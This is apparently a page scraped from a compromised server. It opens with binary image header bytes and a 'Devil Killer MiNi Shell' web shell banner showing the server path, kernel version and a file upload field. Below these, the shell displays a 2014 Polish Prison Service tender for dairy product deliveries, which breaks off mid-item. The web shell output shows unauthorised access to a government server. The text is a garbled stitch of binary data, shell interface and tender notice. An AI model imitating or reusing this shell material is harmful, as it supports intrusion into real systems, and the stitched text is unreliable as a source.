JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140403/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140403/73145-N-2014.html

<p class="kh_header"><b>Popów: Dostawy artykułów mleczarskich dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie</b><br>
<b>Numer ogłoszenia: 73145 - 2014; data zamieszczenia: 03.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Szkolenia Służby Więziennej w Kulach , Kule 2, 42-110 Popów, woj. śląskie, tel. 034 3104030, faks 034 3103653.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Szkolenia Służby Więziennej w Kulach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów mleczarskich dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są dostawy artykułów mleczarskich dla OSSW w Kulach - zadanie nr 1. 1. Jogurt owocowy 15551320-4  kg 500; 2. Mleko 15511000-3  l 1000;
3. Ser topiony 15542200-1  kg 100; 4. Ser żółty 15544000-3  kg 500; 5. Serek homogenizowany 15551000-5  kg 150; 6. Serek homogenizowany 15500000-3  kg 300; 7. Serek homogenizowany 15510000-5 kg 300; 8. Śmietana 15512000-0 kg 400;
9. Twaróg półtłusty 15542100-0 kg 600; 10. Margaryna 15431100-9 kg 300;
11. Masło 15530000-2 kg 1000; 12. Śmietanka do kawy 15512900-9 kg 5; 13. Mleko zagęszczone niesłodzone 15511700-0 l 10; 14. Mleko w kartonie 15511210-8 l 400; 15. Ser feta 15542300-2 kg 30;16. Ser żółty wędzony 15544000-3 kg 150; 17. Jogurt naturalny 15551310-1 kg 60; 18. Ser bez cukru typu wiejski 15542000-9 kg 400;19. Ser do chleba typu kanapkowy 15542000-9 kg 200. 2. Przedmiotem zamówienia są dostawy artykułów mleczarskich dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie - zadanie nr 2. 1. Jogurt owocowy 15551320-4  kg 300;
2. Mleko 15511000-3  l 2000; 3. Ser topiony 15542200-1 kg 90;4. Ser topiony plastry 15542200-1 kg 90; 5. Ser żółty gouda klas I 15544000-3 kg 300; 6. Ser z przyprawami pełnotłusty klasa I 15542200-1 kg 300; 7. Ser typu marmur klasa I 15542200-1 kg 300; 8. Ser żółty salami 15544000-3 kg 300; 9. Ser twardy rolada ustrzycka 15544000-3 kg 300; 10. Serek homogenizowany 15551000-5 kg 300;
11. Śmietana 15512000-0 kg 300; 12.Twaróg półtłusty 15542100-0 kg 300; 13. Twaróg sernikowy 15542100-0 kg 50; 14. Margaryna 15431100-9 kg 50; 15. Masło 15530000-2 kg 700; 16. Śmietanka do kawy 15512900-9 kg 5; 17. Ser feta 15542300-2 kg 20; 18. Jogurt naturalny 15551310-1 kg 120; 19. Serek bez cukru ziarnisty 15542000-9 kg 250; 20. Maślanka 15512000-0 l 50; 21. Kefir 15512000-0 l 50; 22. Mleko smakowe 15511000-3 l 100; 23. Deser mleczny 15512000-0 kg 80;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.10.00-3, 15.54.22.00-1, 15.54.40.00-3, 15.55.10.00-5, 15.51.20.00-0, 15.54.21.00-0, 15.53.00.00-2, 15.51.29.00-9, 15.51.17.00-0, 15.51.12.10-8, 15.54.23.00-2, 15.55.13.10-1, 15.54.20.00-9, 15.55.13.20-4, 15.43.11.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1 ustawy Prawo zamówień publicznych (Dz.U. 2013 poz. 907 z późn. zm.) zwanej dalej ustawą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz oferty stanowiący załącznik do SIWZ. Wypełniony i podpisany formularz cenowy w zakresie zadań od 1 do 2 stanowiący załączniki do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Szkolenia Służby Więziennej w Kulach Kule 2, 42-110 Popów. 
Dział Kwatermistrzowski pok. nr. 2 i 3, pawilon Warta..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2014 godzina 10:00, miejsce: Ośrodek Szkolenia Służby Więziennej w Kulach Kule 2, 42-110 Popów pokój nr 3  sekretariat pawilon Liswarta..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy artykułów mleczarskich dla OSSW w Kulach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa artykułu	Kod CPV Polska Norma	Opis przedmiotu zamówienia	J.m	Ilość    1.	Jogurt owocowy	15551320-4 ZN 95/3	Różne smaki owocowe, poj.100-150g. Opakowanie jednostkowe- kubek z tworzywa sztucznego. Termin przydatności do spożycia min. 2 tygodnie liczony od dnia dostawy.	kg	500
2. Mleko  15511000-3 PN-A-86003	Wygląd i barwa jednolita, smak i zapach czysty bez obcych posmaków i zapachów, barwa jasnokremowa., konsystencja płynna. Mleko normalizowane, pasteryzowane, zawartość tłuszczu 2%, zawartość białka 3 %  Opakowanie bezpośrednie: folia, o poj. 900 ml. Termin przydatności do spożycia 5 dni od daty pasteryzacji.	l 1000  3.	Ser topiony	15542200-1	Ser topiony- trójkąt 25g. Opakowanie - krążki o wadze 200g  zawierające 8 szt x 25g, o różnych smakach i dodatkach np. Z dodatkiem szynki, papryki, szczypiorku, pieczarek, ziół itp.. Termin przydatności do spożycia min. 2 miesiące liczony od dnia dostawy	kg	100
4. Ser żółty   15544000-3 PN-68/A-86230	Ser podpuszczkowy dojrzewający wyprodukowany z mleka pasteryzowanego o ustalonej zawartości tłuszczu z dodatkiem szczepionek kultur mezofilnych i podpuszczki,  w blokach typu holenderskiego Gouda lub Edamski  o bokach lekko wypukłych i zaokrąglonych, o barwie jasnożółtej, smak i zapach delikatny, łagodny, miąższ w miarę miękki, elastyczny, jednolity w całej masie., o terminie  przydatności do spożycia do 90 dni od daty produkcji. Opakowanie : woreczek z folii termokurczliwej, waga do 4 kg. Wyprodukowany zgodnie z podaną PN.	kg	500 5. Serek homogenizowany 15500000-3 Serek homogenizowany o różnych smakach z twarożku odtłuszczonego wyprodukowany z mleka pasteryzowanego, poj. 100g z witaminami A,D,E. Typu Bakuś lub równoważny. Opakowanie - kubek z tworzywa sztucznego. Termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.  kg	150 6. Serek homogenizowany	15500000-3 ZN-95 Twaróg odtłuszczony, różne smaki, typu Danio lub równoważny. Opakowanie jednostkowe kubek z tworzywa sztucznego, poj. 150 g, termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	300 7. Serek homogenizowany 15551000-5 PN-91/A-8630	Serek chudy z mleka pasteryzowanego, różne smaki, opakowanie jednostkowe kubek z tworzywa sztucznego, poj.150g, termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.   	kg	300 8.	Śmietana	15512000-0 PN-90/A-86050	Śmietana słodka 18 %,opakowanie jednostkowe kubek z tworzywa sztucznego, poj. 180g, termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	400 9. Twaróg półtłusty	15542100-0 PN-91/A86300	Twaróg półtłusty krajanka, o smaku kwaśnym. Zawartość tłuszczu 4,0-4,5 %, o przedłużonym terminie ważności, pakowany w pergamin.	kg	600  10.	Margaryna	15431100-9
PN-92/A-86907	Margaryna mleczna do gotowania, smażenia i pieczenia, zawartość tłuszczu roślinnego 60 %. Opakowanie jednostkowe bezpośrednio folia aluminiowa, pośrednie - karton papierowy, waga 225g. Termin przydatności do spożycia 60 dni liczony od dnia dostawy.	kg	300    11.	Masło	15530000-2
PN-A-86155;1995	Jednostka starannie uformowana, smak lekko kwaśny, mlekowy, lekki posmak pasteryzacji, lekko tłuszczowy. Barwa jednolita, o zawartości tłuszczu 82,5%, kwasowość tł. W st. Kwasowości nie więcej niż 2. Opakowanie bezpośrednie to folia aluminiowa, pośrednie - karton papierowy, waga 200g. Termin przydatności do spożycia do 30 dni liczony od dnia dostawy.	kg	1000   12.	Śmietanka do kawy	15512900-9	Śmietanka o zawartości tłuszczu 10 %. poj. 10g 1 kubeczek x 10 szt w opakowaniu zbiorczym,	kg	5 13.	Mleko zagęszczone
niesłodzone 	15511700-0 ZN97/A-I  PL 3012160331W	Mleko zagęszczone, niesłodzone sterylizowane. Zawiera 25% suchej masy całkowitej w tym:7,5% tłuszczu oraz 17,5% suchej masy beztłuszczowej. Stosuje się do kawy, herbaty, kakao oraz do celów kulinarnych. Waga jedn500 g.	l	10 14. Mleko w kartonie	15511210-8 PN-A-86003:1996	Mleko UHT, o zawartości 2% tłuszczu, bez środków konserwujących. Opakowanie jednostkowe - karton o poj. 0,2-1 litr, termin przydatności do spożycia min. 4 miesiące liczony od dnia dostawy	l	400
15.	Ser feta	15542300-2	Ser feta sałatkowo - kanapkowy. Serek miękki solankowy, pełnotłusty, z mleka pasteryzowanego. Opakowanie - karton 270g.	kg	30 16.	Ser żółty wędzony	15544000-3	Wędzony w sposób naturalny kl. I  wyprodukowany zgodnie z Polską Normą	kg	150  17.	Jogurt naturalny	15551310-1 ZN-A86061-2002	Jogurt naturalny bez cukru. Opakowanie jednostkowe - kubek z tworzywa sztucznego, poj. 150- 200g. Termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	60 18.	Serek bez cukru typu  wiejski	15542000-9	Serek ziarnisty o różnych dodatkach smakowych (szczypiorek, koperek, cebula) lub równoważny. Opakowanie jednostkowe kubek z tworzywa sztucznego, poj. 150-200g; termin przydatności do spożycia min. 10 dni liczony od dnia dostawy. kg	400    19	Serek do chleba typu kanapkowy	15542000-9	Serek do chleba o różnych dodatkach smakowych zioła, szczypiorek, śmietana lub równoważny. Opakowanie jednostkowe kubek z tworzywa sztucznego, poj. 100-150g; termin przydatności do spożycia min. 10 dni liczony od dnia dostawy.	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.55.13.20-4, 15.51.10.00-3, 15.54.22.00-1, 15.54.40.00-3, 15.55.10.00-5, 15.51.00.00-5, 15.51.20.00-0, 15.43.11.00-9, 15.53.00.00-2, 15.51.29.00-9, 15.51.17.00-0, 15.51.12.10-8, 15.54.23.00-2, 15.55.13.10-1, 15.54.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy artykułów mleczarskich dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa artykułu	Kod CPV Polska Norma Opis przedmiotu zamówienia	J.m.	Ilość  1. Jogurt owocowy 15551320-4  ZN 95/3	Różne smaki owocowe, poj.100-150g. Opakowanie jednostkowe- kubek z tworzywa sztucznego. Termin przydatności do spożycia min. 2 tygodnie liczony od dnia dostawy. kg	300 2.	Mleko 15511000-3  PN-A-86003	Wygląd i barwa jednolita, smak i zapach czysty bez obcych posmaków i zapachów, barwa jasnokremowa., konsystencja płynna. Mleko normalizowane, pasteryzowane, zawartość tłuszczu 1,5%. Opakowanie bezpośrednie: karton z laminatu wielowarstwowego o poj. 1l. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	l	2000   3.	Ser topiony	15542200-1	Ser topiony- trójkąt 25g. Opakowanie - krążki o wadze 200g  zawierające 8 szt x 25g, o różnych smakach i dodatkach np. Z dodatkiem szynki, papryki, szczypiorku, pieczarek, ziół itp.. Termin przydatności do spożycia min. 2 miesiące liczony od dnia dostawy	kg	90 4.	Ser topiony plastry	15542200-1	Pakowane po 8 plastrów oddzielnie każdy w opakowaniu ok 150 g. Termin przydatności do spożycia min. 2 miesiące liczony od dnia dostawy	kg	90 5.	Ser żółty gouda  klasa I	15544000-3 PN-68/A-86230	Blok  gouda o bokach lekko wypukłych i zaokrąglonych, o barwie jasnożółtej, smak i zapach delikatny, łagodny, miąższ w miarę miękki, elastyczny, jednolity w całej masie., o terminie  przydatności do spożycia do 90 dni od daty produkcji. Opakowanie : woreczek z folii termokurczliwej, waga do 4 kg. Wyprodukowany zgodnie z podaną PN.	kg	300
6.	Ser z przyprawami pełnotłusty   klasa I	15542200-1	Ser topiony z dodatkiem ziół, pieczarek mi papryki; smak i zapach łagodny, lekko orzechowy, aromatyczny, właściwy dla dodatku; konsystencja twarda-nadający się do krojenia; kształt bloku, masa ok. 0,9 kg: pakowany w folię termokurczliwą. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy	kg	300 7. Ser typu marmur klasa I	15542200-1	Wyrób powstały z połączenia dwóch serów-pomarańczowego i białego; w przekroju pomarańczowo-biała mozaika. Kształt bloku, skórka gładka, mocna, pokryta folią. Masa ok. 2 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy	kg	300 8. Ser żółty salami	15544000-3 PN-68/A-86230	kształt: walec o wymiarach: śr. 8 cm, wysokość 25 cm, barwa żółta, jednolita w całej masie; smak i zapach: łagodny, aromatyczny, lekko kwaśny, lekko pikantny; konsystencja: miąższ elastyczny, jednolity w całej masie, oczka okrągłe lub owalne wielkości ziarna ryżu lub małego grochu; zawartość tłuszczu w suchej masie nie mniej niż 45%; opakowanie jednostkowe: folia spożywcza; masa ok. 2,00 kg. Termin przydatności do spożycia: nie krótszy niż  30 dni od daty dostawy.	kg	300 9. Ser twardy rolada ustrzycka	15544000-3 PN-68/A-86230	Walec o średnicy ok 7 cm. zawartość tłuszczu 45% w suchej masie; pakowany próżniowo; widoczne ślady od siatki; masa ok. 300 g. Termin przydatności do spożycia: nie krótszy niż  30 dni od daty dostawy.	kg	300  10.	Serek homogenizowany 15551000-5
PN-91/A-8630	Serek chudy z mleka pasteryzowanego, różne smaki, opakowanie jednostkowe kubek z tworzywa sztucznego, poj.150g, termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.   	kg	300  11. Śmietana	15512000-0 PN-90/A-86050	Śmietana 12% ,opakowanie jednostkowe kubek z tworzywa sztucznego, poj. 400-500g, termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	300  12.	Twaróg półtłusty	15542100-0
PN-91/A86300	Twaróg półtłusty krajanka, o smaku kwaśnym. Zawartość tłuszczu 4,0-4,5 %, o przedłużonym terminie ważności, pakowany w pergamin.	kg	300
13.	Twaróg sernikowy	15542100-0  PN-A-86300:1992;	barwa jednolita, biała do lekko kremowej; smak i zapach: czysty, typowy dla twarożku, bez obcych zapachów, smak lekko kwaśny, lekko słonawy; konsystencja i struktura dobra do smarowania, jednolita w całej masie, bez grudek, lekko mączysty; pakowany hermetycznie w kubki o masie od 1kg do 3kg (wg wskazań zamawiającego). Termin przydatności do spożycia: nie krótszy niż  10 dni od daty dostawy.	kg	50 14.	Margaryna	15431100-9 PN-92/A-86907	Margaryna mleczna do gotowania, smażenia i pieczenia, zawartość tłuszczu roślinnego 60 %. Opakowanie jednostkowe bezpośrednio folia aluminiowa, pośrednie - karton papierowy, waga 250g. Termin przydatności do spożycia 60 dni liczony od dnia dostawy.	kg	50
15	Masło 	15530000-2 PN-A-86155;1995	Jednostka starannie uformowana, smak lekko kwaśny, mlekowy, lekki posmak pasteryzacji, lekko tłuszczowy. Barwa jednolita, o zawartości tłuszczu 82,5%, kwasowość tł. W st. Kwasowości nie więcej niż 2. Opakowanie bezpośrednie to folia aluminiowa, pośrednie - karton papierowy, waga 200g. Termin przydatności do spożycia do 30 dni liczony od dnia dostawy.	kg	700 16.	Śmietanka do kawy	15512900-9 	Śmietanka o zawartości tłuszczu 10 %. poj. 10g 1 kubeczek x 10 szt w opakowaniu zbiorczym,	kg	5 17.	Ser feta	15542300-2	Ser feta sałatkowo - kanapkowy. Serek miękki solankowy, pełnotłusty, z mleka pasteryzowanego. Opakowanie - karton 270g.	kg	20 18. Jogurt naturalny	15551310-1 ZN-A86061-2002	Jogurt naturalny bez cukru. Opakowanie jednostkowe - kubek z tworzywa sztucznego, poj. 400-500g. Termin przydatności do spożycia min. 14 dni liczony od dnia dostawy.	kg	120
19.	Serek bez cukru  ziarnisty	15542000-9	Serek ziarnisty o różnych dodatkach smakowych (szczypiorek, koperek, cebula) lub równoważny. Opakowanie jednostkowe kubek z tworzywa sztucznego, poj. 150-200g; termin przydatności do spożycia min. 10 dni liczony od dnia dostawy.	kg	250   20.	Maślanka	15512000-0  PN-A-86061:2002;	konsystencja płynna, jednolita w całej masie bez grudek tłuszczu; barwa jednolita biała do lekko kremowej; smak i zapach: lekko kwaśny, aromatyczny, orzeźwiający, bez obcych posmaków; zawartość tłuszczu 1,5%; opakowanie jednostkowe: pudełko kartonowe z laminatu wielowarstwowego o poj. 1 l. Termin przydatności do spożycia: nie krótszy niż 7 dni od daty dostawy.	litr	50 21.	Kefir	15512000-0 PN-A-86061:2002;	 płyn jednolity w całej masie; barwa biała z odcieniem kremowym; konsystencja jednolita; smak i zapach: lekko kwaśny do kwaśnego, orzeźwiający, charakterystyczny dla kefiru; zawartość tłuszczu 2%; opakowanie jednostkowe: kubki z folii polistyrenowej zamykane przykrywką z folii aluminiowej o pojemności  400-500 g. Termin przydatności do spożycia: nie krótszy niż  7 dni od daty dostawy. litr	50 22. Mleko smakowe	15511000-3 PN-A-86003:1996;  ciecz jednorodna, dopuszcza się niewielką sedymentację cząstek dodatków smakowo-zapachowych, nie 